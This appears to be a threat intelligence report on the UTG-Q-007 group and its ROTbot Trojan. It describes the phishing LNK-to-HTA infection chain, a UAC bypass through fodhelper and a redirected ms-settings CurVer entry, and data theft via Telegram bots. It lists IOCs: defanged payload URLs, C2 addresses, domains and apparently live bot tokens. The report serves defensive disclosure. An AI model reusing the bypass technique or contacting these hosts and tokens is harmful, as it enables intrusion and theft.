Overview
QiAnXin Threat Intelligence Center detected targeted phishing emails received by customers during routine endpoint operations. The attachment, named "版權資訊及版權保護政策 Dentsu Taipei.zip," contained a malicious lnk file and a normal PDF lure. Tianqing EDR intercepted the script Trojan in time. Although the attackers did not cause significant damage to our customers, the Chinese lure and subsequent Trojan used by this group caught our interest.
After some investigation, we named this criminal group UTG-Q-007. Their targets include Asian countries such as China, South Korea, Vietnam, and India, with industries involving construction, real estate marketing, and the internet. They utilize the unique ROTbot Trojan to steal sensitive data such as cryptocurrency, intellectual property, and social media accounts. Similar to the profit model of faceduck Group (ducktail), they hijack Facebook business account ads. We have disclosed relevant details to the open-source community for analysis and investigation by friendly companies.
Technical Details
In the attack targeting the cryptocurrency industry, the delivered PDF is as follows:
The delivered LNK metadata is as follows:
It calls forfiles.exe and executes a PowerShell script, ultimately launching mshta to load a remote HTA script file. The opendir content of the C2 server is as follows:
139.99.23.XX-Tru.hta is mainly a obfuscated VBScript file, which mainly functions to start a PowerShell script:
After AES decryption and Gzip decompression, the content is executed as follows:
he attackers used an improved UAC bypass technique. To avoid antivirus interception, they created a progID named .omg and redirected the CurVer entry in the ms-settings progID to .omg. When launching the system file fodhelper.exe, it first uses the ms-settings progID to open the file and read the content of CurVer, which has been redirected to the .omg progID created by the attacker. Finally, it executes the ps script in the $OMG variable, with the $code content as follows:
Download and run a compressed package from a remote server. The attackers have been continuously updating the HTA execution chain. In the latest LNK lure, the execution chain is completely different from the above. UTG-Q-007 delivered various types of Trojans: NetSupport, Stealc, AsyncRAT, Rhadamanthys, many of which are provided by the MAAS family. After eliminating the commonly used Trojans by MAAS, we found a new type of Trojan used by UTG-Q-007, which we named ROTBot, with Vietnamese appearing in the PDB.
| - |
|---|
| PDB |
| D:\ROT\ROT\Build rot Export\2024\Bot Export Chiến\14.225.210.XX-Chiến -Ver 2.0\GPT\bin\Debug\spoolsv.pdb |
ROTbot first retrieves basic information about the victim's device and compares it with a built-in list using the public IP, process list, username, and computer name from the basic information. If it appears in the list, execution is terminated.
After detection, it retrieves the first-stage payload via a GET request, with the URL being a Google Cloud document.
Returns a ChildBot.txt file containing information encrypted twice with Base64. After decryption, it is as follows:
The first part is the link for obtaining the next stage payload (Google Cloud document), and the second and third parts are used to concatenate the URL for notifying the device of online status (Telegram bot). Then it releases a DLL file from the resources: SQLite.Interop.dl to the current directory.
The collected information is compiled into an online package, formatted as follows:
Uploaded to Telegram bot via the Telegram API.
After successful online, the API function getUpdates is called to check whether the online package was sent successfully. Then, the retrieved configuration information is written to the Setting.xml file.
Finally, the AI.dll resource file is loaded into memory and its Plugin.Run method is executed. The next stage configuration file is obtained through the URLArgsMainBot field (the second Google document link) after decrypting the configuration.
After decryption, the configuration is divided into two parts, with the first part being the C2 and the second part being the mutex name.
The current screen is captured and saved to the temp folder. The image file name consists of 16 random characters. Then, the screenshot is uploaded to the Telegram bot via the API. A screenshot is sent every time a message is sent to the Telegram bot, with the message appended to the screenshot.
Selective persistence operations are performed based on the AVDetect field.
If Kaspersky is present, no persistence operation is performed. If AVG and Avast are present, the following message is sent to the TG bot:
Stealing browser data including Facebook, Instagram, YouTube, and commercial version TikTok.
Attackers want to hijack some social media account ads for economic gain. The attack intent is similar to that of the faceduck Group (ducktail) gang. We detailed faceduck Group's domestic attack activities in our year-end report in 2023, but we did not find any evidence of overlap between UTG-Q-007 and faceduck Group.
Finally, ROTbot enters remote control logic, reconnecting to the C2 in the second stage configuration file. Analysis revealed that the control code originates from the open-source project Quasar.
Infrastructure and Victims
Based on telemetry data from the QiAnXin Threat Intelligence Center, UTG-Q-007 uses a large number of proxy websites when hosting HTA scripts, possibly purchasing MAAS-related services:
| - | - |
|---|---|
| Proxy Website | Website Description |
| hxxps://solutionsinengineering.com/Source.hta | Australian construction company WordPress |
| hxxps://all-access-media.com/media/templates/site/localer-en.hta | Photo website |
| hxxps://thecreativelion.com/wp-content/uploads/2021/11/xczxcxzcxzcxzcxzc23.hta | IT company WordPress |
| hxxps://topmark-tuitioncentre.co.uk/wp-content/uploads/useanyfont/wp-contentplugins.hta | Educational institution WordPress |
| hxxps://elmejorlocal.com.co/wp-content/uploads/2018/05/cachexxx.hta | Shopping mall WordPress |
| hxxps://one-stopspa.com/wp-content/uploads/2019/11/lolcaljefosijfoesnofiegoiesgnos.hta | Medical beauty WordPress |
| hxxps://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta | Food company WordPress |
| hxxps://alexiakombou.com/wp-content/uploads/2021/12/EN-localer.hta | Personal blog WordPress |
| hxxp://mw-solaris.com/solaris.hta | Blockchain gaming website |
In addition to proxy websites, domains registered by the UTG-Q-007 group also show a certain regularity.
The C2 server that ROTbot reconnects to is as follows:
| - |
|---|
| C2 |
| 14.225.210.97:12024 |
| 14.225.210.98:12024 |
The above IP belongs to the Vietnam Posts and Telecommunications Group (VNPT). The VPS provided by this company is relatively inexpensive. In previous attack incidents, we observed only a few groups using VNPT's VPS as proxies for their attack activities. It is not common to see them used as C2.
In 2024, ROTbot used three Telegram bots in total:
| - | - | - |
|---|---|---|
| Bot | first_name | username |
| 6548823856:AAFj_qauGdRc8HWmo1ZSBQ_EtviF7hK0GKo | Debug2024149XXbot | tetris149_bot |
| 6383173017:AAH2kFOJOIXulitofO7YV1QBI8VOzzFoA-Y | Chienthan1425Bot | chiendebug14225Bot |
| 6712371927:AAF6lsf9WRb4cggeJzfTgHTreot8-jO1CTk | AKhue14225XXBot | KhueVu14225Bot |
After brief monitoring, we observed a victim located in Vietnam who was having their YouTube credentials stolen.
The screen capture uploaded by the victim is as follows:
At the time of data theft, the victim was using SketchUp architectural software for modeling. The taskbar below also had CrossFire (an FPS game operated by Tencent) installed, which aligns with the gaming ecosystem in the victim's region. From the version history, it appears that the attacker has iterated through several versions. ROTbot's activity may have started earlier. Although it is still in the debugging phase, it has shown remarkable capabilities since early 2024. The QiAnXin Threat Intelligence Center will continue to monitor it.
Conclusion
Currently, all products based on the threat intelligence data of the QiAnXin Threat Intelligence Center, including the QiAnXin Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situational Awareness, support precise detection of such attacks.
IOC
MD5:
120c6d7e78fb92b2feada47c9d8bbab0
b86ba0844db442df61a5889b004e615b
30705266725f9bad60ea12821acf740a
8bd7eece235cee14ab700f23b7ac29db
51bad062733f1babc99254ca06db0e46
90a4af96abea4d8179c789fa3c72ddcf
82456d523f39ecb87324542c918e7dd6
6dd355c754cc7d3bcdeeeef32fdc16c9
C2:
14.225.210.97:12024
14.225.210.98:12024
HTA Payload:
hxxp://149.248.79.118/149248XX/149248XX.hta
hxxp://154.56.56.41/nilxvnq.hta
hxxp://199.34.27.196/139.99.23.XX/139.99.23.XX-Tru.hta
hxxp://199.34.27.196/139.99.23.XX/139.99.23.XX.hta
hxxp://199.34.27.196/14.225.210.98/14.225.210.XX-Khue.hta
hxxp://199.34.27.196/14.225.210.XX/14.225.210.XX-Chien.hta
hxxp://45.9.190.201/dt-excv.hta
hxxp://51.79.208.192/T/T.hta
hxxp://80.76.51.250/Downloads/start-of-proccess.lnk
hxxp://81.19.140.150/crypto.hta
hxxp://82.115.223.34/pdf/final.hta
hxxp://83.217.9.36/manual.hta
hxxp://94.156.253.211/Downloads/run-dwnl-restart.lnk
hxxp://mw-solaris.com/solaris.hta
hxxps://alexiakombou.com/wp-content/uploads/2021/12/EN-localer.hta
hxxps://all-access-media.com/media/templates/site/localer-en.hta
hxxps://coingecko.bond/lass.hta
hxxps://coingecko.bond/PuttyUac.hta
hxxps://distribution.adrdownload.software:40430/e4f0340b1/Scan004_40599.hta
hxxps://elmejorlocal.com.co/wp-content/uploads/2018/05/cachexxx.hta
hxxps://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta
hxxps://one-stopspa.com/wp-content/uploads/2019/11/lolcaljefosijfoesnofiegoiesgnos.hta
hxxps://solutionsinengineering.com/Source.hta
hxxps://thecreativelion.com/wp-content/uploads/2021/11/xczxcxzcxzcxzcxzc23.hta
hxxps://topmark-tuitioncentre.co.uk/wp-content/uploads/useanyfont/wp-contentplugins.hta
Domain:
adobe.bar
adobe.charity
coingecko.bet
coingecko.bio
coingecko.bond
coingecko.center
coingecko.cfd
coingecko.codes
coingecko.space
dwnld.fun
dwnld.online
libreoffice.best
libreoffice.bet
libreoffice.bond
libreoffice.wiki
losbandygs.org.es
mlr.lat
op-09816me.lat
plomtenburg.com
post-b09276.info
tetromask.online
tetromask.site
update.bar
updts.space
www.losbandygs.org.es
www.plomtenburg.com
www.post-b09276.info
Reference Link
[1].https://ti.qianxin.com/uploads/2024/02/02/dcc93e586f9028c68e7ab34c3326ff31.pdf